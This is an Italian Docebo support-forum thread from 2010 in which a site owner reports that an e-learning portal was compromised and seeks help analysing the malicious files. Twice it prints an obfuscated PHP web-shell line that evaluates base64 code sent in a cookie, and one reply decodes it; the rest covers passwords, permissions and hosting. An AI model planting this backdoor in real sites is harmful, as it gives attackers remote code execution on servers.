Post fatti : 162 Profilo |
Oggetto : file index.php forse modificato, rilevato come virus... questa mattina un utente mi ha segnalato che il proprio antivirus rilevava un virus nel mio portale di e-learning
ho controllato e il file index.php e risulta modificato in data 22/!2 (io non credo di aver inserito aggiornamenti, specie a questo file, in tale data)
ho ripristinato provvisoriamente la versione originale presa dal pacchetto di installazione, anche la dimensione è diversa, dai 6 originali si è passati a ben 12!!!!
ho pensato di allegarvelo, qualcuno può darmi una mano?
ho visto che in fondo alla pagina c'è uno script lunghissimo e compresso!!
Messaggio modificato da : dado1 il : 26/01/2010 12:48 |
| |
Scritto il : 26/01/2010 11:47 ( più di un mese ) Oggetto : Re: file index.php forse modificato, rilevato come virus... c'è poi un altro file, che contiene:
<'''php eval(base64_decode('aWYoaXNzZXQoJF9DT09LSUVbIlBIUFNFU1NJSUQiXSkpe2V2YWwoYmFzZTY0X2RlY29kZSgkX0NPT0tJRVsiUEhQU0VTU0lJRCJdKSk7ZXhpdDt9')); echo "checking email..."; ?''>
|
| |
 Post fatti : 615 Profilo |
Scritto il : 26/01/2010 12:36 ( più di un mese ) Oggetto : Re: file index.php forse modificato, rilevato come virus... Direi proprio che ti hanno bucato il sito, è capitato anche a noi l'hanno scorso, con lo stesso tipo di manomissione del file index (anche tuttigli index delle sottocartelle di primo livello direi)
Cmq, per prima cosa cambia le password ftp, poi dovrebbe bastare eliminare la stringa criptata dai file index Messaggio modificato da : pastoweb il : 26/01/2010 12:38 |
| |
Scritto il : 26/01/2010 12:44 ( più di un mese ) Oggetto : Re: file index.php forse modificato, rilevato come virus... ma si riesce a capire cosa diavolo fa questo script? c'è che voi sappiate il modo di decriptarlo?
il file interessato sembrerebbe essere solo la index inisiale
Messaggio modificato da : dado1 il : 26/01/2010 12:46 |
| |
Scritto il : 26/01/2010 21:42 ( più di un mese ) Oggetto : Re: file index.php forse modificato, rilevato come virus... c'è poi un altro file, che contiene:
<'''php eval(base64_decode('aWYoaXNzZXQoJF9DT09LSUVbIlBIUFNFU1NJSUQiXSkpe2V2YWwoYmFzZTY0X2RlY29kZSgkX0NPT0tJRVsiUEhQU0VTU0lJRCJdKSk7ZXhpdDt9')); echo "checking email..."; ?''>
questo codice corrisponde a: if(isset($_COOKIE["PHPSESSIID"])){eval(base64_decode($_COOKIE["PHPSESSIID"]));exit;} in php che utilità può avere secondo voi? |
| |
Scritto il : 26/01/2010 22:33 ( più di un mese ) Oggetto : Re: file index.php forse modificato, rilevato come virus... sono riuscito a trovare tutto quello di cui avevo bisogno
Messaggio modificato da : dado1 il : 27/01/2010 00:29 |
| |
 Post fatti : 1861 Profilo |
Scritto il : 27/01/2010 09:24 ( più di un mese ) Oggetto : Re: file index.php forse modificato, rilevato come virus... ciao, sei in hosting dedicato o condiviso? che in caso di hosting condiviso potrebbero anche aver bucato un altro sito e tramite quello infettare tutto quello che riuscivano sul server.. di solito, nel caso di server linux, possono modificare solo file o cartelle che han permessi a 666/777.. che però non dovrebbe essere il caso dell'index.php
ciao, Giovanni. Docebo Staff - Docebo 4 released! - |
| |
Scritto il : 30/01/2010 01:52 ( più di un mese ) Oggetto : Re: file index.php forse modificato, rilevato come virus... l'hosting è dedicato su aruba, ho un server professional 1.1, mi è successa la stessa cosa però su un server windows condiviso, i permessi per il file index erano 755, forse era quella la falla si sicurezza? ora ho messo tutto a 644.
è possibile che sia un problema a monte di aruba??
|
| |
Scritto il : 01/02/2010 09:19 ( più di un mese ) Oggetto : Re: file index.php forse modificato, rilevato come virus... ciao, non saprei dirti di preciso se è un problema di aruba.. però se ti è successo anche su un altro loro spazio non lo escluderei e in ogni caso non ci risultano problemi di sicurezza segnalati che possano portare a problemi di questo tipo.
ciao, Giovanni. Docebo Staff - Docebo 4 released! - |
| |
Scritto il : 02/02/2010 10:27 ( più di un mese ) Oggetto : Re: file index.php forse modificato, rilevato come virus... sisi mi è capitato anche su un altro serve, piattaforma diversa, software diverso linguagghio diverso e script diverso. (uno linux uno windows, uno iis uno apache, uno php uno asp) |
| |
 Post fatti : 2688 Profilo |
Scritto il : 13/02/2010 14:38 ( più di un mese ) Oggetto : Re: file index.php forse modificato, rilevato come virus... In realtà c'é un securiryfocus da indagare, ne abbiamo ricevuto segnalazione privata in azienda. Giovanni fasati con fabio in merito Cla Docebo CEO and Founder www.docebo.com
|
| |
Scritto il : 13/02/2010 23:00 ( più di un mese ) Oggetto : Re: file index.php forse modificato, rilevato come virus... da chi è stato segnalato?, intendo un cliente oppure un azienda tipo aruba? si sa niente a proposito? sono un po' preoccupato.
Messaggio modificato da : dado1 il : 13/02/2010 23:01 |
| |
Scritto il : 15/02/2010 09:38 ( più di un mese ) Oggetto : Re: file index.php forse modificato, rilevato come virus... Per la segnalazione di securityfocus approfondirò con Fabio; nel caso specifico comunque credo che il problema sia simile a quello riportato da un utente in questo articolo del 7 Febbraio (ed escluderei quindi che sia legato a Docebo).
ciao, Giovanni. Messaggio modificato da : giovanni.derks il : 15/02/2010 09:39 Docebo Staff - Docebo 4 released! - |
| |